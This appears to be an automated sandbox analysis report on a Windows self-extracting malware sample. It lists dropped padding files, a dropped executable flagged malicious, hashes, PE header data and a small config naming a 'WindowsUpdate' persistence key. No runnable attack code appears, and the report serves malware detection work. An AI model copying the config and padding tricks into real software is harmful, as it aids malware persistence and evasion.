                                                                                                                                                    Preview:01CtI38o1H76Y8R5Ogu5366zoDg3S817..GuiDateTimePicker FileConstants..02f8b733ir5vC5mALCrZ24c474N0n4tcy7Z17rOR13F9r72477j44T..ButtonConstants FontConstants..550ne570930595iapUEGo9GY8K1L2Vu0n61N8858l0782vrFm91Y140x59t206s5HxP0BSB0aW4l42BFjU6O041G6t7J5pU29u..FontConstants BorderConstants..95h7P1tRRy66DV81X0hdZ70kRscuJ3LNugs7DV7237q4xZS68z6a22wSrw027FVqeroH44H..BorderConstants ToolbarConstants..135Liw32lOvj29LFB8P630N48Rd9A8jJFK344Z17807nKY9x936tKyo41..ColorConstants BorderConstants..1CX774W775hcAH0Q5HD9V7O2h448iv2jk2u605nIe82477P2lMNZI48y3ihav43fT2dfa176RqN20O8m581wyw1r2Cw9P9703h7cTb084Rjl6683Yf90207F7t3Z58Xtr8i..ButtonConstants ColorConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):686
                                                                                                                                                    Entropy (8bit):5.609085570277811
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:f0lWGZEo5epC4RXitZ6V8lqHx3Ol+/SwZBChhdRDjORlFPI1h2rEbWVs4Kqvx:xGqC4RXMK8qO4/S8BChHR+3C1Wku
                                                                                                                                                    MD5:AD648C8818A74800CEA50CA6D7AFB649
                                                                                                                                                    SHA1:F146194D6B62FD61BB37B2A9A7DF64F5BD6D7BB0
                                                                                                                                                    SHA-256:C32B59E53FE7283D8FD4BBB2BA8FB9B68D27683FC4F773B7025AEBD4E71E654B
                                                                                                                                                    SHA-512:9885E22FF1B1666916BBDDA72B8F40D8ED8CC7015CE6529CE552102F0C379D8352CB7F65176B9A55AD1D857FA50211B220CBBD2C81730E9297C8E03597ED083B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:9M5ut700bF7z5pv6aF6w1FaPKq03o9mzq1jtS64Wxd3R499GEm3P84Q1ET4R1..DateTimeConstants GuiDateTimePicker..50582ShsYU4pD5L56Zl1q..UpDownConstants ColorConstants..2h4T8fq0z6S80l9133815E636F657xb37q74V21FfUGXP91nCw1L1ts4jPjb65lHCW96C2F08m3486jk85w7L5omIu66VP41rCLS49UVZJ8VXgo453e327U7Z0xH0mi4..DateTimeConstants FontConstants..1355d741H8T712f497T6m81P42Epn57d02ZlPvi4o131IsUYG086Gi220D3Kf2P1LNS1Ac130G4GSt096c1WE8GF3oE88m641560297NNO6GA4pl27K44DN44RpJU848Q183CrNFlD..TreeViewConstants BorderConstants..UGq4898hLl9fKn3k97p29589uw6AJ0012yg71L2UmX6132v5i0l1Hz62u2oSxV5987o6iYa766qa06057GHC8F3lOH3cU78bVjM6a3NHD7QF7x062152997n1vWq0VxQzv4tD2V59Xir1kR317k3bC1S780..DateTimeConstants ToolTipConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):534
                                                                                                                                                    Entropy (8bit):5.553428869759938
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rrEvL7sn0PVaJuyfkx0PU9rPVuzP+Gqv4:rrGgXkxfdPVM+Gv
                                                                                                                                                    MD5:44BCCC48AEA68F6C7601B4C28E13DFFE
                                                                                                                                                    SHA1:2F6DE537DFC7BE56A1DDE34817428EFFC89D09AD
                                                                                                                                                    SHA-256:12DF5C527A4FA33C11945127CAE2B627FC904F903B3D5E1FA790FA5E93526DCF
                                                                                                                                                    SHA-512:B36429D395D36654781659B544ADFE26C99DFE0FBB579C24C6907287B7807BDB25967E06908779EE6F6FF324C863FAF7A6C9162040C1D4CCCC6649A7ECB5AD38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:89069X8LAB4l8RR52uXi71900vB640p53vq949FjzvRBeYon6H183851210jF1o..ButtonConstants ToolTipConstants..BnR6bX1b3X8099F8109m1400T5K4iJ5oje19BK4b783wQUp6r227ghnv9UrH9UO6jd4i026v7gGg62QX..TreeViewConstants ColorConstants..1229WIHF4344S77Xv96h52M5d04Ac59hLpY0r2RXubMt55h9SD09U12eqB3Inp0iJqyRB0964AwT912uON1x45VJnB1184e44b..TreeViewConstants FontConstants..s5K9Z75872s736EzEov7M4L5QAm016662L7h7j15u466vi6UM39iRl4Hhy1004Lk43w4lg51v5543R8qBD4u38Fck0535c7512mRMblz54890516n7q5fOJ30qty0062AJL4EO35gn8a2KtL3f53z9yP..ComboConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):508
                                                                                                                                                    Entropy (8bit):5.444647219340999
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AwZsTyknfb56qFZJwkwjGjy4FBP8kkkpct:RsHnz56qZYGjywmlkpY
                                                                                                                                                    MD5:95ED1612D4995A1339883F3C2DA20BED
                                                                                                                                                    SHA1:BBA7FEABF0182AAF1BF2B48314BE515C9326A686
                                                                                                                                                    SHA-256:B2FFD14EE25FFEACE578F6FD512FC49005AFF59FD057607D0FA2C600DAFED696
                                                                                                                                                    SHA-512:3B3EA03399C734A2C927EF41FFD971306504F672E4B5FA8AB7897CD54C5986FF2EC0BAB0825860746AD262D8F89D59D0797EE5B13628E40B45F83F8256C4A266
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:50q42698J25h..DateTimeConstants FontConstants..u24v210sq759b2750lGgVn3J019OkLP1N8tSU7b6sqQ2xx3005x92xk56R583R7B87P2882xh111i87m3l29KP49Pb1JNL8172732F5712UcxfIVr039w01TM624419osyZp..DateTimeConstants ComboConstants..o8FcF87jYazt7lf9P42jm59t4s60300394oP7332fw273r1879944JM7J8Sm9z6i7wd0UR90q90..ToolbarConstants BorderConstants..6l595I52..ButtonConstants TreeViewConstants..TqqXG09gYin3J78x51H7j215vm0g08u2715A48K31BVmS4P6q7pZ5oNr67eO62a55Y77a1000TmId3r9L08r1hBF5K0y60H2G1lT23iw0..FileConstants ComboConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):572
                                                                                                                                                    Entropy (8bit):5.522453659556589
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ZBfrt2UERrH5IhZL85zxhOORdCT+CqVUIdm3Wot87R:ZJ523NYZRgYtkm27R
                                                                                                                                                    MD5:FC495C99E26C918CCCAFE8A212355EE9
                                                                                                                                                    SHA1:15A87B4265DA49FB5D9EDADE69111D49BA55B8DA
                                                                                                                                                    SHA-256:010E35603796229A5EEA475725E2F191DFEFCB0AE06306E8502045A84FCA335F
                                                                                                                                                    SHA-512:80AB91EE659BFC895F8AAE514D63DA5DD8F3F53CB2C16B91A24F0CBFD83D604026C18C5FF0237E8E8754242A96C74655CAB215548FDEA894EB56CB7C0FC8922B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:d32tfVU8R4M9E1289d0Co62qwZYq3860U9O7Iki56760q1ak4m985d1AQ7u6v80H9xFv09s0483u2eVz7vJx18fHJTABR83dZAHT29066AD516Iw6p5f3..ToolTipConstants StructureConstants..1Gg6xiP999yP804oQtyUe74US469544Y3702f5E668ei66t37k7I4Q8Z88793v172M13478548r612S3233iLOvE1853SoZ..BorderConstants ButtonConstants..7778VAG511l7QNAI7xR5185rn7V340An428u1D0tnT98ey2..ToolbarConstants StructureConstants..w2bvphkA731P0SsI0I9w627g2i4oKvp2E3C9sz7G954p2091IFy5r1I0230w5w2789cW7uv8jSun59qTn46878vT9Q92mO28wY9mU0IF094758Xj8t89n08d9S17XjL3l3N5L66C1e2GS0mr2enBUcE75o7B037Oa2r..ToolbarConstants ToolbarConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):616
                                                                                                                                                    Entropy (8bit):5.593470127639937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:NWSdpPp4vnIw9ahP6EviWL1eVCmMLXQllE0U7gX+aOmR:Ys4wHJvXe87Tgm0nuaOmR
                                                                                                                                                    MD5:95E90D53B6DD6501967D8E2D9BF0EF8B
                                                                                                                                                    SHA1:EB28D3148C97BE0F2650972F6772E8CE84D86D51
                                                                                                                                                    SHA-256:846E94F46D1201E4AFDF32F0374C90AD4D1E23E89B5000C96EA124C80C8524DA
                                                                                                                                                    SHA-512:B2EA6242F7F2754F4D3D9B478EE97713D8F635393C681164A07AC5C475B623495F9AE0BC243964A591CFE540FDDD4CD195323BB918A63E761AC23E0C4ADED046
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:a71x0l2e8Ec1jejYAwV9295zDkG5u27Y69qY2113380nwbN2Pi149I8J67..TreeViewConstants ToolTipConstants..221eY4ot9822MEPAKV5thUi6o9685ny6C8642EY9QGCUbsY4w88J1bqFeh64017sz7S50p7G4n9ys7WKop02n978F8Q181o6vpIcEF2Z12X..FontConstants GuiDateTimePicker..rCpyBb74r34E92uS1hvc63C7H3vU25yc1yj20P4I84QM87i5i1123TV83j69Dw1381532Vp301YPN3nlGb7vtU5dQlZ2771Kn08184879889w4ux24p1w1p244v0p9259l5edpuJv9K30cl24043513439Nyi..DateTimeConstants DateTimeConstants..35qP760eQR252V7hq65102837jC7xcs45AHkODAT2A45xMK44l0t5HINmG802808Duc45d49H2c74fKP9mvCK04kA46N058k95zmm07w05eW7996VGERpu9j1CJn9dZ7CUr7g5J3x6RUU36TUMQk..FileConstants ToolbarConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):564
                                                                                                                                                    Entropy (8bit):5.514774909684432
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:JeodvXxNOBJdqM4h6XVgaKkyIO9jxLCwSDe+wXXzJ:Je8vOb34h6XVg887SDe+wXXzJ
                                                                                                                                                    MD5:BC4084B5A1C6B6D70D37A0D4D657FB84
                                                                                                                                                    SHA1:3011BC2E36349DF995CC0440B9579829E4628402
                                                                                                                                                    SHA-256:1581F7FD0889C340453E9A34846A61B899671FC59E8B2E67C98F628C290968A2
                                                                                                                                                    SHA-512:004E366AC7B64D083E329D9EF91C0EBECD9E966F52D93B94C2293EF30CDFA793A6D18E73074FD3148FEDD2FD4EF7E382046050503F1FEE83E20856B9B8DA64D4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:4kI02Bm527GQp6f2s8YGY69OT315k88932GoMP8v27061U89y618443566MZ288a28WX47M6E79i324B2i2D2m34CYhx8r31f465..BorderConstants UpDownConstants..4U24Q717C3a8l82L3gK9p090B0IQ3dO7hKi2kv6dg0pS831yCju714X2o2..ColorConstants ToolTipConstants..2p9K3W4u9nVf3T..BorderConstants ColorConstants..ah4L3OC481xcsT5253Pge2AyL830858m4u58Ux3v0pgOKdE1333lG5414F4C8De11cWoKH23Gp19mcfNr7J8t954XaW3NSnTC0q0cY6ye0Y387Le3HYsR12EQ..ToolTipConstants DateTimeConstants..j21IC8aRcx8J2M..BorderConstants GuiDateTimePicker..160Jc76FzEjN3OJDJg95Wh372b8690s193640V3na04585Y..FontConstants FontConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):569
                                                                                                                                                    Entropy (8bit):5.607960549209402
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:wbKXLINQ3giBAseD3lImN8Rq674u2bWwFVCaMlUNJ09ON0aBPc:wbKXMQVBJnmc779gWg9G40aO
                                                                                                                                                    MD5:7399AD2ED1976A8AF8FD293039757336
                                                                                                                                                    SHA1:1B60BB127972D76F4243310B05849C2937E4BE76
                                                                                                                                                    SHA-256:06E60D78DD1402360ED52DD46A1F09787B52CBC4CEF80676F5600CA49CCBBB23
                                                                                                                                                    SHA-512:446FA89E11D2D3EE7ECE303273C573D37AE6A7D490F70101B8A174AE6F3FAE859F51F0FC8D52588B6C6C00FE98C2943556FC8BA9A33D8324CBAA2F649371449B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:G63Ah60Y48540xIUNl7j2083w0Gnh5514HSH2A53ogqaCpG19VV2c82493j7088nLOuOPU5AWMf09915E2ag96oD5467P412584MW1xLHVZQi6BifJ1245298T3..BorderConstants FontConstants..lpoy252u2POZL4i2w5FZI03pc0g6068ndO1EOklhFmm27646swE3hQ3554gRI9fup9v0l37..FontConstants StructureConstants..5199q8DhUO0Z2Sv1h190iH16p2o9v8U56N600q00C31U6637c9BcB983x6y7M350y7dJz3H133118968N9R3j1437U52237t8I25H..ComboConstants ToolTipConstants..8n5074w2TQK442655GI5N99m1A42Mt03KgSpJN3Y6Xl4n4BV2J9UwgI7qpRJ57KqKh05ZgjU93M5la8iAGl7o4TEKn8WFW3tM24P1U810wE5Y051948CULA454jgHKw28kTr9Q..ComboConstants TreeViewConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.6259340620268485
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nLEs50ubuRJk68a9EKgRecunhJ932kDtx/:LXpbArd9wDuhJR2k/
                                                                                                                                                    MD5:35470D47483607BF2DE0FDC542EFD0A6
                                                                                                                                                    SHA1:C2085CF4A1A687201DCB2AF61D7F2BB28473F664
                                                                                                                                                    SHA-256:E72BF5652C4E6E6FCCB590BFCB2E6081C4C6F540D61ABDE5FF168BA641D34C6F
                                                                                                                                                    SHA-512:D95FFCC8458D3DB253388CFFC61DB76331008AA0D9223E91B8ACB2E1C60AD0C19501720FC67F5207B82B191ECFD8BC75E479C3F37FFBA83493CAC61B11680A36
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:nj3b210Z3UP3L26cnFC2r618n9YZizNA9g8gK1AXX134125Lzy02TEt69Uth0S4Qz5l67Lv885M28zC1330m43x1k6n1015HCA8ZK29UA5X5bHY13..UpDownConstants StructureConstants..eF999mo8xq0t7411wvZjxO11qr2WR9g71P..BorderConstants BorderConstants..8327hUvZe4n53udL12vuK898eh9zn29HLbJ4319wH6j2jN5t9473y7Ef0FOc419K7C6WZ9F7zXVtMXoyDNH15Fu95Fp636..ButtonConstants StructureConstants..v6565y0pM4EXh6bl8ufHEF37mqsf5zNnMs1R19Z1xd8f010cmB6sSaVG7C5UD3m98fjd18934A6cp6K9409385whk4p94T7y65Y10ZUPla6733M01H47..GuiDateTimePicker ComboConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):533
                                                                                                                                                    Entropy (8bit):5.555122671725166
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RdDw8Z9v6lt21VgwOBPsptEyIrQakNSc3fA6:jUs9v+rK0bkAc3l
                                                                                                                                                    MD5:18B3CA792233B183954D86380D53BAF2
                                                                                                                                                    SHA1:FE7D78E2EF67B2B37BF608B7D8D2D9820A483322
                                                                                                                                                    SHA-256:4E8D26FBD55BDA61F1CBDA0326439663F32B735D8B70B52D531150AACBE236C8
                                                                                                                                                    SHA-512:6CE4A5ADBB3F9C48C5B35A03188DD0EA9218D2D4A0E79AD19DDFC77FF882A5B39BC57E62C8EC7A4F289E8127E5520E9FF1465FC0502057D43EB61F100522E562
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:b4f726l0QGf76y..ButtonConstants FileConstants..3WbMc4AZ97o6I09TWs53ba879m2l4yVIp43cIp06W213mvDU4w18lKl3rJMz5f2cG00M6535E05v4jr29A22881o4UCj9666hu9l7ic5o442621Kcj453JX68k63..UpDownConstants BorderConstants..073CZ36HV5W1QjzX822E01DxZhY624VCfQ7m3m3574k6fQ64in5a143S44k21VQgq68no8q2A6X8JC81E0597K272m03gRe2C9KBT53..DateTimeConstants TreeViewConstants..52e5PwO90U61RO743Wn9m637x7og2V6VKBWk8mJEr42641Gq9OD79wcv1h2PqR34422GU2uZQ7Mp0b5528biUH121230atT782477cDk2m6w65E70tpFa02BrX6NzNj5k92n762Pqne67512b91mDeo..BorderConstants ColorConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.5345726532215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:xPX+i9s1IZgyy+naIaSbICMulsOraBP0A9R6ved9:xPX+Gs1IMcf5ICdzaCA36Gd9
                                                                                                                                                    MD5:4C33AC9510E5F22AEA359252392E7DC6
                                                                                                                                                    SHA1:D8F0D8C95A43043F68C1794FF7CEF803CCDCB969
                                                                                                                                                    SHA-256:5603CB963F200915EB60ACEB7837EDB35CB1BE8CCFF16FBA9DD1EAF26272DE06
                                                                                                                                                    SHA-512:96610AC9CEB1040CF1F063D701148848289ED51E7A1A6C235DD684B4A75073FB7BA092686EDD97AFDEEAEF8DF390BE88220633215C42325BFFB141C03D0A98BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:5Dm8835K23W09Hj601A42B4U6li2423HmO5e10X4CedB37E0BtoOWy7qT8XVvc1U42j18kC530J1542wMgX08OL..StructureConstants ToolTipConstants..8W5V0m4F54Y5fXRi099K3g4oXt0R0W0Q7h136r9718k56979K915643PGj4BKlH9885023xCJU9jL3KByQL35301oJ0Hm1s693i2U23Kr83Q6umW0589RW7j5G1v22Ywg..GuiDateTimePicker ButtonConstants..3Hp9CZ7851K3ZTPFX88Cm60DtuA9R8wD04q7D4178Q64trFM417b2Ua4glw8Z15Uc6v020D7A18F425By7..ToolbarConstants TreeViewConstants..U5L14060Qasd4Xm82t330h28PZ0e5Wx..StructureConstants StructureConstants..2hCx10E5X5OO753T2X6ZpjtA2039n3jTQ58936346A72Sst21ob7CCk712O..ButtonConstants UpDownConstants..
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):75082
                                                                                                                                                    Entropy (8bit):2.98395248326991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QRzzzzzzzzzzzpYqqqqqqqqqqqqqqqqqqqqqqqqN0YDDDDDDDDDDDDDDDDDDDDDE:pH5mUKW7/3WCv+nohnrQ
                                                                                                                                                    MD5:E35FFF73AEE2E4616A02721A2BB87382
                                                                                                                                                    SHA1:493FB9EE1BE78EE56AFDAAA41B0C96470A20F491
                                                                                                                                                    SHA-256:27BBC7BAED22B649F4F9E5C8F07B46DE15D18AB0D98EA38FF8B28D9690BF553C
                                                                                                                                                    SHA-512:76A901A66E701C7C937AABEF2D5B4F8E488E25D89C683DA61E28B6419AAA75C322A9E5F66C9951388F876E89B485BCBC0AB2108F6FB58882205503E3FB08F4BE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.....T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.....T.e.l.e.V.r.a.m.(.1.2.4.).:.
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):78
                                                                                                                                                    Entropy (8bit):4.878368809094884
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YRRvuf0nNp9JlC9hRGdYX26LIw:Av7hoGXNw
                                                                                                                                                    MD5:45185EE7D06012E9FEEFAE9CAC4A07FC
                                                                                                                                                    SHA1:9B59DD7CF3233FC239F7A9CB846CEF6D55DC4B91
                                                                                                                                                    SHA-256:955DC301E143A1DD4A40BA2A907A117940AAD4430190AD0281F10A20709429B0
                                                                                                                                                    SHA-512:946ACD1FBCEA7CD93EF5935FAC6EF95A607CB7BE9A42149064D8012614F5B4762A68F852FB798813A73BC3F631EBD1DDA9F022E9A2E12061B23CC88AFA08C9A7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=qbmt..ExE_c=oxhvi.msc..
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):7.774899458480801
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:M1Y6kc9FpE.exe
                                                                                                                                                    File size:1'050'479 bytes
                                                                                                                                                    MD5:7d8165e194302250d880425b1608e307
SHA1: 2688c9a6a3946fd7d93fd861c5f94c0dd67ae593
SHA256: a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9
SHA512: eb1c4dd9095dcd6a82616f7d4260e45ee686e4c80c0f046639fdae08fd5c70ead604be0d4cce09d01466b239726c93ec4de579222eb755c6cdf641fd902c415f
SSDEEP: 24576:hN/BUBb+tYjBFHNhM6FI9Dh7S95UqJXRX1zJ54D+q0lPBzkFd:jpUlRhPMn2owXRX1zJ5w+JPBAd
TLSH: 7A251212BBC58072D07329321FB697A0257C75312F6289DB53D069AD9F719C2DA32FA3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
Icon Hash: 4d0d0d191d1d197d
Entrypoint: 0x4265d0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x6640971F [Sun May 12 10:17:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 99ee65c2db82c04251a5c24f214c8892
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x47d70 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x47da4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x5134 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5e000 | 0x2afc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x44580 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x44600 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3ec58 | 0x40 | .rdata
